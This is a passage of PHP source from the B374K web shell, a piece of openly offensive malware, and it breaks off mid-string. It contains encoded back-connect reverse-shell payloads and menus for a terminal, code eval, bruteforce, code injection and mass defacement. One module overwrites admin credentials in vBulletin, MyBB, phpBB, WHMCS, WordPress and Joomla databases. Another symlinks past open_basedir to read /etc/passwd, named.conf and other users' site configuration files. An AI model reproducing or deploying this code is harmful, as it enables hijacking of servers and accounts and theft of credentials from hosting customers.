  550. $back_connect='fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==';
  551. $back_connect_c='XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==';
  552. $style='tVbNctowEL53pu+gGSaXDjA2mDSxT2kKT9DptSMjGauxJY8tBwiTd+/qx7JMDORSgfnRane1n77dVSrI8YRSvH3Z1aLlJJ4EeiToHWF0QpIe5IzQraixZILHXHCqZF+/4DgXr7QGZVETWs9SIaUo47A6oEYUjKBJ9PywfNqo1d9OKBNczhr2RuMQliTmf4ZLVhzjXzgXJZ7+pjXBHE+faoaLBG1FIep4stHD+JyUlLfD7YZ6JKjE9Y7x+AHchwF8RPAslCOnh/AJVZgQxnexlgZKbPUgYN/qQo/kQvgFlRIibiq8VcZ0PDllu1zGaEXLZM+IzGMULuD3rBRvMwtRjQlrGxDQEkXw2O/khtgPwYHuQ/CoXgMIFj4CNw/ILpCiGpH+78DmEqecylO3/XAFW8CtFCjQX932QL3f21IPa6DEjANVzeYeV3cJTI4x2jpYBp2DUDOg44Smjf5Y2R8OGRvASk2NxO3PH2ZNjonYx8qQswh7SKMsg1V7mr4wObZw5a3Tce3wUaWgyQM/nTrZRSnjVSvfxhPFohn0gV8nSZcK4yTppJ7btJXjnm1CdzvtMk8R1W3L558eoNbWDehVgnHIusTzZJJhinrHn65JVylvohGtBKvIEXNAxhElw78wCO5cNYgCw6IRMnbgB32Vmm9LArw4DSy9o3lOMfnDeCb6+oUsaiBNQ7+4LgeUDj6ArguaJR4YgdccktkFobeRLj5hsaYkuWBMidC7MvRHpoXtIbhgOx5vqT7DwdkrPR8PN9UlmYbyUvJXeaWgQVBFCjqErjcZGINDBXKVpVs9eiP34B8qa3JuJZ/CM16PL5KwC0CDvDdU4aIuVdcbWM8XQO7+j+pgI2B6rfX+7Kz8kmdBGNbGLn/9xqiRmtNDBUDQD2y08zduB26ZhvlWNvYnpSBGBeN0ZlNoEbn0cCbzPhEe7LFcxrLXMsUBeZB2c5+6xPi26rE+vPwewftDwTKqr4zuM6Yo6qusf66f1z8c6c46levgXrTWXEPLtOVHdkKENVWBjxb7/uzdxcYWTFU+xvhu2+ajlzAr72IUum6pZ6/TbwlLnDvFVk8WaZmRwM2Jjwn/Qldz9fbcn64DprAI3nc+U210wc4yryEGwWYTrkH0Dw==';
  553. ;echo '<html>
  554. <head>
  555. <title>B374K - ';echo $xName;;echo ' (Priv8)</title>
  556. <link href=\'http://g1204.hizliresim.com/w/6/452h7.png\' rel=\'shortcut icon\'/>
  557. <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = \'none\'; document.getElementById(baru).style.display = \'block\'; } </script>
  558. <style type="text/css">
  559. ';echo gzinflate(base64_decode($style));;echo '</style>
  560. </head>
  561. <div class="main">
  562. <!-- head info start here -->
  563. <div class="head_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class="b1">B<span class="b2">374</span>K</span></a></td></tr><tr><td><span class="gaya">r00t@';echo $xName;;echo ':~$<br>';echo $xTeam;;echo '</span></td></tr></table></td> <td>';echo $buff;;echo '</td> </tr></table> </div>
  564. <!-- head info end here -->
  565. <!-- menu start -->
  566. <div id="menu">
  567. <a href="?';echo 'y='.$pwd;;echo '">r00t</a>
  568. <a href="?';echo 'y='.$pwd;;echo '&amp;x=shell">terminal</a>
  569. <a href="?';echo 'y='.$pwd;;echo '&amp;x=php">Eval</a>
  570. <a href="?';echo 'y='.$pwd;;echo '&amp;x=mysql">Mysql</a>
  571. <a href="?';echo 'y='.$pwd;;echo '&amp;x=netsploit">Netsploit</a>
  572. <a href="?';echo 'y='.$pwd;;echo '&amp;x=mail">Mail</a>
  573. <a href="?';echo 'y='.$pwd;;echo '&amp;x=brute">Bruteforce</a>
  574. <a href="?';echo 'y='.$pwd;;echo '&amp;x=Code">Code Injector</a>
  575. <a href="?';echo 'y='.$pwd;;echo '&amp;x=sym">Symlink</a>
  576. <a href="?';echo 'y='.$pwd;;echo '&amp;x=reset">Reset</a>
  577. <a href="?';echo 'y='.$pwd;;echo '&amp;x=mass">Zone-h</a>
  578. <a href="?';echo 'y='.$pwd;;echo '&amp;x=reverse">Reverse-ip</a>
  579. <a href="?';echo 'y='.$pwd;;echo '&amp;x=about">Credit</a>
  580. <a href="?';echo 'y='.$pwd;;echo '&amp;x=out">Logout</a>
  581. </div>
  582. <!-- menu end -->
  583. ';
  584. if(isset($_GET['x']) &&($_GET['x'] == 'out')) {
  585. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  586. echo 'See You Soon :)';
  587. }
  588. elseif(isset($_GET['x']) &&($_GET['x'] == 'reset'))
  589. {
  590. ;echo ' <form action="?y=';echo $pwd;;echo '&amp;x=reset" method="post">
  591. ';
  592. echo'<center><pre>
  593. </pre></center>';
  594. echo "<br><br><center><form method=POST action''><input class='inputzbut' type=submit name=vbulletin value='vBulletin'><input class='inputzbut' type=submit name=mybb value='MyBB'><input class='inputzbut' type=submit name=phpbb value='phpBB'><input class='inputzbut' type=submit name=whmcs value='WHMCS'><input class='inputzbut' type=submit name=wordpress value='WordPress'><input class='inputzbut' type=submit name=joomla value='Joomla'></form><p>Coded By MrAtoms</center>";
  595. if (isset($_POST['vbulletin']))
  596. {
  597. echo "<center><table border=0 width='100%'>
  598. <tr><td>
  599. <center><font face='Arial' color='#000000'>Change vBulletin Info<br>Patch Control Panel : [patch]/admincp<br>Path Config : [patch]/includes/config.php<br>includes/init.php </font>
  600. <font face='Arial' color='#FF0000'>>></font><font face='Arial' color='#000000'> includes/class_core.php </font>
  601. <font face='Arial' color='#FF0000'>>></font><font face='Arial' color='#000000'> includes/config.php</font></center>
  602. <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input value=localhost class='inputz' type=text name=dbhvb size='50' ><br>
  603. <font face='Arial' color='#000000'>DB name<br></font><input class='inputz' type=text name=dbnvb size='50' ><br>
  604. <font face='Arial' color='#000000'>DB user<br></font><input class='inputz' type=text name=dbuvb size='50' ><br>
  605. <font face='Arial' color='#000000'>DB password<br></font><input class='inputz' type=password name=dbpvb size='50' ><br>
  606. <font face='Arial' color='#000000'>Table prefix<br></font><input class='inputz' type=text name=prvb size='50' ><br>
  607. <font face='Arial' color='#000000'>User admin<br></font><input class='inputz' type=text name=urvb size='50' ><br>
  608. <font face='Arial' color='#000000'>New password admin<br></font><input class='inputz' type=password name=psvb size='50' ><br>
  609. <font face='Arial' color='#000000'>New E-mail admin<br></font><input class='inputz' type=text name=emvb size='50' ><br><br>
  610. <input type=submit value='Change' class='inputzbut' ><br>
  611. </form></center></td></tr></table></center>";
  612. }else{
  613. $dbhvb = $_POST['dbhvb'];
  614. $dbnvb = $_POST['dbnvb'];
  615. $dbuvb = $_POST['dbuvb'];
  616. $dbpvb = $_POST['dbpvb'];
  617. @mysql_connect($dbhvb,$dbuvb,$dbpvb);
  618. @mysql_select_db($dbnvb);
  619. $urvb=str_replace("\'","'",$urvb);
  620. $set_urvb = $_POST['urvb'];
  621. $psvb=str_replace("\'","'",$psvb);
  622. $pass_vb = $_POST['psvb'];
  623. $emvb=str_replace("\'","'",$emvb);
  624. $set_emvb = $_POST['emvb'];
  625. $vb_prefix = $_POST['prvb'];
  626. $table_name = $vb_prefix.'user';
  627. $query = 'select * from '.$table_name .' where username="'.$set_urvb .'";';
  628. $result = mysql_query($query);
  629. $row = mysql_fetch_array($result);
  630. $salt = $row['salt'];
  631. $pass2 = md5($pass_vb);
  632. $pass =$pass2 .$salt;
  633. $set_pssalt = md5($pass);
  634. $tiger1 = 'UPDATE '.$table_name .' SET password="'.$set_pssalt .'" WHERE username="'.$set_urvb .'";';
  635. $tiger2 = 'UPDATE '.$table_name .' SET email="'.$set_emvb .'" WHERE username="'.$set_urvb .'";';
  636. $ok1=@mysql_query($tiger1);
  637. $ok1=@mysql_query($tiger2);
  638. if($ok1){
  639. echo "<script>alert('vBulletin Info Changed ;)');</script>";
  640. }
  641. }
  642. if (isset($_POST['mybb']))
  643. {
  644. echo "<center><table border=0 width='100%'>
  645. <tr><td>
  646. <center><font face='Arial' color='#000000'>Change MyBB Info<br>Patch Control Panel : [patch]/admin<br>Path Config : [patch]/inc/config.php</font></center>
  647. <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input value=localhost class='inputz' type=text name=dbhmy size='50' ><br>
  648. <font face='Arial' color='#000000'>DB name<br></font><input class='inputz' type=text name=dbnmy size='50' ><br>
  649. <font face='Arial' color='#000000'>DB user<br></font><input class='inputz' type=text name=dbumy size='50' ><br>
  650. <font face='Arial' color='#000000'>DB password<br></font><input class='inputz' type=password name=dbpmy size='50' ><br>
  651. <font face='Arial' color='#000000'>Change user admin<br></font><input class='inputz' type=text name=urmy size='50' ><br>
  652. <font face='Arial' color='#000000'>Change E-mail admin<br></font><input class='inputz' type=text name=emmy size='50' ><br>
  653. <font face='Arial' color='#000000'>Table prefix<br></font><input class='inputz' value='mybb_' type=text name=prmy size='50' ><br><br>
  654. <input type=submit value='Change' class='inputzbut' ></form></center></td></tr></table></center>";
  655. }else{
  656. $dbhmy = $_POST['dbhmy'];
  657. $dbnmy = $_POST['dbnmy'];
  658. $dbumy = $_POST['dbumy'];
  659. $dbpmy = $_POST['dbpmy'];
  660. @mysql_connect($dbhmy,$dbumy,$dbpmy);
  661. @mysql_select_db($dbnmy);
  662. $urmy=str_replace("\'","'",$urmy);
  663. $set_urmy = $_POST['urmy'];
  664. $emmy=str_replace("\'","'",$emmy);
  665. $set_emmy = $_POST['emmy'];
  666. $my_prefix = $_POST['prmy'];
  667. $table_name1 = $my_prefix.'users';
  668. $tiger3 = "UPDATE $table_name1 SET username ='".$set_urmy."' WHERE uid ='1'";
  669. $tiger4 = "UPDATE $table_name1 SET email ='".$set_emmy."' WHERE uid ='1'";
  670. $ok2=@mysql_query($tiger3);
  671. $ok2=@mysql_query($tiger4);
  672. if($ok2){
  673. echo "<script>alert('MyBB Info Changed ;)');</script>";
  674. }
  675. }
  676. if (isset($_POST['phpbb']))
  677. {
  678. echo "<center><table border=0 width='100%'>
  679. <tr><td>
  680. <center><font face='Arial' color='#000000'>Change phpBB Info<br>Patch Control Panel : [patch]/adm<br>Path Config : [patch]/config.php</font></center>
  681. <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input value=localhost class='inputz' type=text name=dbhphp size='50' ><br>
  682. <font face='Arial' color='#000000'>DB name<br></font><input class='inputz' type=text name=dbnphp size='50' ><br>
  683. <font face='Arial' color='#000000'>DB user<br></font><input class='inputz' type=text name=dbuphp size='50' ><br>
  684. <font face='Arial' color='#000000'>DB password<br></font><input class='inputz' type=password name=dbpphp size='50' ><br>
  685. <font face='Arial' color='#000000'>Change user admin<br></font><input class='inputz' type=text name=urphp size='50' ><br>
  686. <font face='Arial' color='#000000'>Change password admin<br></font><input class='inputz' type=password name=psphp size='50' ><br>
  687. <font face='Arial' color='#000000'>Table prefix<br></font><input class='inputz' value=phpbb_ type=text name=prphp size='50' ><br><br>
  688. <input type=submit value='Change' class='inputzbut' ></form></center></td></tr></table></center>";
  689. }else{
  690. $dbhphp = $_POST['dbhphp'];
  691. $dbnphp = $_POST['dbnphp'];
  692. $dbuphp = $_POST['dbuphp'];
  693. $dbpphp = $_POST['dbpphp'];
  694. @mysql_connect($dbhphp,$dbuphp,$dbpphp);
  695. @mysql_select_db($dbnphp);
  696. $urphp=str_replace("\'","'",$urphp);
  697. $set_urphp = $_POST['urphp'];
  698. $psphp=str_replace("\'","'",$psphp);
  699. $pass_php = $_POST['psphp'];
  700. $set_psphp = md5($pass_php);
  701. $php_prefix = $_POST['prphp'];
  702. $table_name2 = $php_prefix.'users';
  703. $tiger5 = "UPDATE $table_name2 SET username_clean ='".$set_urphp."' WHERE user_id ='2'";
  704. $tiger6 = "UPDATE $table_name2 SET user_password ='".$set_psphp."' WHERE user_id ='2'";
  705. $ok3=@mysql_query($tiger5);
  706. $ok3=@mysql_query($tiger6);
  707. if($ok3){
  708. echo "<script>alert('phpBB Info Changed ;)');</script>";
  709. }
  710. }
  711. if (isset($_POST['whmcs']))
  712. {
  713. echo "<center><table border=0 width='100%'>
  714. <tr><td>
  715. <center><font face='Arial' color='#000000'>Change WHMCS Info<br>Patch Control Panel : [patch]/admin<br>Path Config : [patch]/configuration.php</font></center>
  716. <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input value=localhost type=text name=dbhwhm size='50' class='inputz' ><br>
  717. <font face='Arial' color='#000000'>DB name<br></font><input type=text name=dbnwhm size='50' class='inputz' ><br>
  718. <font face='Arial' color='#000000'>DB user<br></font><input type=text name=dbuwhm size='50' class='inputz' ><br>
  719. <font face='Arial' color='#000000'>DB password<br></font><input type=password name=dbpwhm size='50' class='inputz' ><br>
  720. <font face='Arial' color='#000000'>Change user admin<br></font><input type=text name=urwhm size='50' class='inputz' ><br>
  721. <font face='Arial' color='#000000'>Change password admin<br></font><input type=password name=pswhm size='50' class='inputz' ><br><br>
  722. <input type=submit value='Change' class='inputzbut' ></form></center></td></tr></table></center>";
  723. }else{
  724. $dbhwhm = $_POST['dbhwhm'];
  725. $dbnwhm = $_POST['dbnwhm'];
  726. $dbuwhm = $_POST['dbuwhm'];
  727. $dbpwhm = $_POST['dbpwhm'];
  728. @mysql_connect($dbhwhm,$dbuwhm,$dbpwhm);
  729. @mysql_select_db($dbnwhm);
  730. $urwhm=str_replace("\'","'",$urwhm);
  731. $set_urwhm = $_POST['urwhm'];
  732. $pswhm=str_replace("\'","'",$pswhm);
  733. $pass_whm = $_POST['pswhm'];
  734. $set_pswhm = md5($pass_whm);
  735. $tiger9 = "UPDATE tbladmins SET username ='".$set_urwhm."' WHERE id ='1'";
  736. $tiger10 = "UPDATE tbladmins SET password ='".$set_pswhm."' WHERE id ='1'";
  737. $ok5=@mysql_query($tiger9);
  738. $ok5=@mysql_query($tiger10);
  739. if($ok5){
  740. echo "<script>alert('WHMCS Info Changed ;)');</script>";
  741. }
  742. }
  743. if (isset($_POST['wordpress']))
  744. {
  745. echo "<center><table border=0 width='100%'>
  746. <tr><td>
  747. <center><font face='Arial' color='#000000'>Change WordPress Info<br> Patch Control Panel : [patch]/wp-admin<br> Path Config : [patch]/wp-config.php<br></font></center>
  748. <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input value=localhost type=text name=dbhwp size='50' class='inputz'><br>
  749. <font face='Arial' color='#000000'>DB name<br></font><input type=text name=dbnwp size='50' class='inputz'><br>
  750. <font face='Arial' color='#000000'>DB user<br></font><input type=text name=dbuwp size='50' class='inputz'><br>
  751. <font face='Arial' color='#000000'>DB password<br></font><input type=password name=dbpwp size='50' class='inputz'><br>
  752. <font face='Arial' color='#000000'>Change user admin<br></font><input type=text name=urwp size='50' class='inputz'><br>
  753. <font face='Arial' color='#000000'>Change password admin<br></font><input type=password name=pswp size='50' class='inputz'><br>
  754. <font face='Arial' color='#000000'>Table prefix<br></font><input value=wp_ type=text name=prwp size='50' class='inputz'><br>
  755. <input type=submit value='Change' class='inputzbut' ></form></center></td></tr></table></center>";
  756. }else{
  757. $dbhwp = $_POST['dbhwp'];
  758. $dbnwp = $_POST['dbnwp'];
  759. $dbuwp = $_POST['dbuwp'];
  760. $dbpwp = $_POST['dbpwp'];
  761. @mysql_connect($dbhwp,$dbuwp,$dbpwp);
  762. @mysql_select_db($dbnwp);
  763. $urwp=str_replace("\'","'",$urwp);
  764. $set_urwp = $_POST['urwp'];
  765. $pswp=str_replace("\'","'",$pswp);
  766. $pass_wp = $_POST['pswp'];
  767. $set_pswp = md5($pass_wp);
  768. $wp_prefix = $_POST['prwp'];
  769. $table_name4 = $wp_prefix.'users';
  770. $tiger11 = "UPDATE $table_name4 SET user_login ='".$set_urwp."' WHERE ID ='1'";
  771. $tiger12 = "UPDATE $table_name4 SET user_pass ='".$set_pswp."' WHERE ID ='1'";
  772. $ok6=@mysql_query($tiger11);
  773. $ok6=@mysql_query($tiger12);
  774. if($ok6){
  775. echo "<script>alert('WordPress Info Changed ;)');</script>";
  776. }
  777. }
  778. if (isset($_POST['joomla']))
  779. {
  780. echo "<center><table border=0 width='100%'>
  781. <tr><td>
  782. <center><font face='Arial' color='#000000'>Change Joomla Info<br>Patch Control Panel : [patch]/administrator<br>Path Config : [patch]/configuration.php</font></center>
  783. <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input value=localhost class='inputz' type=text name=dbhjos size='50'><br>
  784. <font face='Arial' color='#000000'>DB name<br></font><input class='inputz' type=text name=dbnjos size='50'><br>
  785. <font face='Arial' color='#000000'>DB user<br></font><input class='inputz' type=text name=dbujos size='50'><br>
  786. <font face='Arial' color='#000000'>DB password<br></font><input class='inputz' type=password name=dbpjos size='50'><br>
  787. <font face='Arial' color='#000000'>Change user admin<br></font><input class='inputz' type=text name=urjos size='50'><br>
  788. <font face='Arial' color='#000000'>Change password admin<br></font><input class='inputz' type=password name=psjos size='50'><br>
  789. <font face='Arial' color='#000000'>Table prefix<br></font><input class='inputz' value=jos_ type=text name=prjos size='50'><br>
  790. <input type=submit value='Change' class='inputzbut'></form></center></td></tr></table></center>";
  791. }else{
  792. $dbhjos = $_POST['dbhjos'];
  793. $dbnjos = $_POST['dbnjos'];
  794. $dbujos = $_POST['dbujos'];
  795. $dbpjos = $_POST['dbpjos'];
  796. @mysql_connect($dbhjos,$dbujos,$dbpjos);
  797. @mysql_select_db($dbnjos);
  798. $urjos=str_replace("\'","'",$urjos);
  799. $set_urjos = $_POST['urjos'];
  800. $psjos=str_replace("\'","'",$psjos);
  801. $pass_jos = $_POST['psjos'];
  802. $set_psjos = md5($pass_jos);
  803. $jos_prefix = $_POST['prjos'];
  804. $table_name5 = $jos_prefix.'users';
  805. $tiger13 = "UPDATE $table_name5 SET username ='".$set_urjos."' WHERE id ='62'";
  806. $tiger14 = "UPDATE $table_name5 SET password ='".$set_psjos."' WHERE id ='62'";
  807. $ok7=@mysql_query($tiger13);
  808. $ok7=@mysql_query($tiger14);
  809. if($ok7){
  810. echo "<script>alert('Joomla Info Changed ;)');</script>";
  811. }
  812. }
  813. }
  814. elseif(isset($_GET['x']) &&($_GET['x'] == 'sym'))
  815. {
  816. ;echo ' <form action="?y=';echo $pwd;;echo '&amp;x=sym" method="post">
  817. ';
  818. echo "<br><br><center>
  819. <form method=POST action''>
  820. <input class='inputzbut' type=submit name=1 value='Symlink'>
  821. <input class='inputzbut' type=submit name=2 value='Symlink'>
  822. <input class='inputzbut' type=submit name=3 value='Localdomain'>
  823. <input class='inputzbut' type=submit name=4 value='Configweb'>
  824. <input class='inputzbut' type=submit name=5 value='Jumping'>
  825. </form></center>";
  826. if (isset($_POST['1']))
  827. {
  828. $fakedir='cx';
  829. $fakedep=16;
  830. $num=0;
  831. if(!empty($_GET['file'])) $file=$_GET['file'];
  832. else if(!empty($_POST['file'])) $file=$_POST['file'];
  833. else $file='';
  834. echo '<PRE><img src="http://1.bp.blogspot.com/-b8EqGk8iTBU/TmUKsjjoioI/AAAAAAAAAXc/NB3oVGXzGRY/s1600/ryu.png"><P>This Symlink tool compile by Ryuzaki <a
  835. href="http://justryuz.blogspot.com/">Justryuz</a>.
  836. <p>symlink open_basedir bypass
  837. <p><form name="form"
  838. action="http://'.$_SERVER['HTTP_HOST'].htmlspecialchars($_SERVER['PHP_SELF']).'" method="post"><input class="inputzbut" type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input class="inputzbut" type="submit" name="hym" value="Create Symlink"></form>';
  839. if(empty($file))
  840. exit;
  841. if(!is_writable('.'))
  842. die('not writable directory');
  843. $level=0;
  844. for($as=0;$as<$fakedep;$as++){
  845. if(!file_exists($fakedir))
  846. mkdir($fakedir);
  847. chdir($fakedir);
  848. }
  849. while(1<$as--) chdir('..');
  850. $hardstyle = explode('/',$file);
  851. for($a=0;$a<count($hardstyle);$a++){
  852. if(!empty($hardstyle[$a])){
  853. if(!file_exists($hardstyle[$a]))
  854. mkdir($hardstyle[$a]);
  855. chdir($hardstyle[$a]);
  856. $as++;
  857. }
  858. }
  859. $as++;
  860. while($as--)
  861. chdir('..');
  862. @rmdir('fakesymlink');
  863. @unlink('fakesymlink');
  864. @symlink(str_repeat($fakedir.'/',$fakedep),'fakesymlink');
  865. while(1)
  866. if(true==(@symlink('fakesymlink/'.str_repeat('../',$fakedep-1).$file,'symlink'.$num))) break;
  867. else $num++;
  868. @unlink('fakesymlink');
  869. mkdir('fakesymlink');
  870. die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');
  871. }
  872. if (isset($_POST['2']))
  873. {
  874. echo '<center>';
  875. @mkdir('sym_',0777);
  876. $hdt = "Options all\nDirectoryIndex Sux.html\nAddType text/plain .php\nAddHandler server-parsed .php\nAddType text/plain .html\nAddHandler txt .html\nRequire None\nSatisfy Any";
  877. $hfp =@fopen ('sym/.htaccess','w');
  878. fwrite($hfp ,$hdt);
  879. if(function_exists('symlink')) {
  880. @symlink('/','sym_/root');
  881. }
  882. $d0mains = @file('/etc/named.conf');
  883. if(!$d0mains) {
  884. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  885. echo "<table align='center' width='40%' ><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";
  886. $dt = file('/etc/passwd');
  887. $l=0;
  888. foreach($dt as $d) {
  889. $r = explode(':',$d);
  890. if(strpos($r[5],'home')) {
  891. echo '<tr'.($l?' class=l1':'').'><td>'.$j.'</td><td>---</td><td>'.$r[0]."</td><td><a href='sym_/root".$r[5]."/public_html' target='_blank'>symlink</a></td></tr>";
  892. $l=$l?0:1;
  893. $j++;
  894. }
  895. }
  896. echo '</table>';
  897. }else {
  898. echo '<table border=1 bordercolor=#4C83AF ><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>';
  899. $count=1;
  900. $mck = array();
  901. foreach($d0mains as $d0main){
  902. if(@eregi('zone',$d0main)){
  903. preg_match_all('#zone "(.*)"#',$d0main,$domain);
  904. flush();
  905. if(strlen(trim($domain[1][0])) >2){
  906. $mck[] = $domain[1][0];
  907. }
  908. }
  909. }
  910. $mck = array_unique($mck);
  911. $usr = array();
  912. $dmn = array();
  913. foreach($mck as $o) {
  914. $infos = @posix_getpwuid(fileowner('/etc/valiases/'.$o));
  915. $usr[] = $infos['name'];
  916. $dmn[] = $o;
  917. }
  918. array_multisort($usr,$dmn);
  919. $dt = file('/etc/passwd');
  920. $passwd = array();
  921. foreach($dt as $d) {
  922. $r = explode(':',$d);
  923. if(strpos($r[5],'home')) {
  924. $passwd[$r[0]] = $r[5];
  925. }
  926. }
  927. $l=0;
  928. $j=1;
  929. foreach($usr as $r) {
  930. echo '<tr'.($l?' class=l1':'').'><td>'.$count++."</td>
  931. <td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td>
  932. <td>'.$r."</td>
  933. <td><a href='sym_/root".$passwd[$r]."/public_html' target='_blank'>symlink</a></td></tr>";
  934. flush();
  935. $l=$l?0:1;
  936. $j++;
  937. }
  938. echo '</table>';
  939. }
  940. echo '</center>';
  941. }
  942. if (isset($_POST['3']))
  943. {
  944. echo '<center>';
  945. $d0mains = @file('/etc/named.conf');
  946. if(!$d0mains){
  947. echo "<pre style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  948. }else {
  949. echo '<table border=1 bordercolor=#4C83AF ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>';
  950. $unk = array();
  951. foreach($d0mains as $d0main){
  952. if(@eregi('zone',$d0main)){
  953. preg_match_all('#zone "(.*)"#',$d0main,$domains);
  954. flush();
  955. if(strlen(trim($domains[1][0])) >2){
  956. $unk[] = $domains[1][0];
  957. flush();
  958. }
  959. }
  960. }
  961. $count=1;
  962. $unk = array_unique($unk);
  963. $l=0;
  964. foreach($unk as $d){
  965. $user = posix_getpwuid(@fileowner('/etc/valiases/'.$d));
  966. echo '<tr'.($l?' class=l1':'').'><td>'.$count.'</td><td><a href=http://'.$d.'/>'.$d.'</a></td><td>'.$user['name'].'</td></tr>';
  967. flush();
  968. $count++;
  969. $l=$l?0:1;
  970. }
  971. echo '</table>';
  972. }
  973. echo '</center>';
  974. }
  975. if (isset($_POST['4']))
  976. {
  977. mkdir('web_',0755);
  978. chdir('web_');
  979. $file = '.htaccess';
  980. $filez = "$file";
  981. $filex = fopen ($filez ,'w') or die ('0.o?');
  982. $file = 'Options FollowSymLinks MultiViews Indexes ExecCGI
  983. AddType application/x-httpd-cgi .Dz
  984. AddHandler cgi-script .Dz
  985. AddHandler cgi-script .Dz';
  986. fwrite( $filex ,$file ) ;
  987. fclose($filex);
  988. $config = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCnByaW50JzwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4NCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29udGVudD0iZW4tdXMiIC8+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4NCjxsaW5rIGhyZWY9Imh0dHA6Ly96b25lLWgub3JnL2ltYWdlcy9jZmxhZ3MvcG5nL215LnBuZyIgcmVsPSJzaG9ydGN1dCBpY29uIi8+DQo8dGl0bGU+Q29uZmlnIENoZWNrZXI8L3RpdGxlPg0KPHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCi5keiB7DQogICAgZm9udC1mYW1pbHk6IFZlcmRhbmE7DQogICAgZm9udC1zaXplOiAxNXB4Ow0KICAgIGZvbnQtd2VpZ2h0OiBib2xkOw0KICAgIGNvbG9yOiByZWQ7DQogICAgdGV4dC1hbGlnbjogY2VudGVyOw0KICAgIHRleHQtc2hhZG93OiB3aGl0ZSAxcHggMHB4IDVweDsNCn0NCiNjaGVja291dHRleHRhcmVhIHsNCiAgICB3ZWJraXQtYm9yZGVyLXJhZGl1czogMTVweDsNCn0NCjpob3ZlciNjaGVja291dHRleHRhcmVhIHtvcGFjaXR5OiAwLjY7IGJhY2tncm91bmQtY29sb3I6MzMzMzMzfQ0KPC9zdHlsZT4NCjwvaGVhZD4NCic7DQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiRtc3IgPSBxeHtwd2R9Ow0KJGtvbGE9JG1zci4iLyIuJHVzZXI7DQoka29sYT1+cy9cbi8vZzsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2hvcC1vcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbS9pbmNsdWRlcy9jb25maWd1cmUucGhwJywka29sYS4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbW1lcmNlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zY29tbWVyY2VzL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZXMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv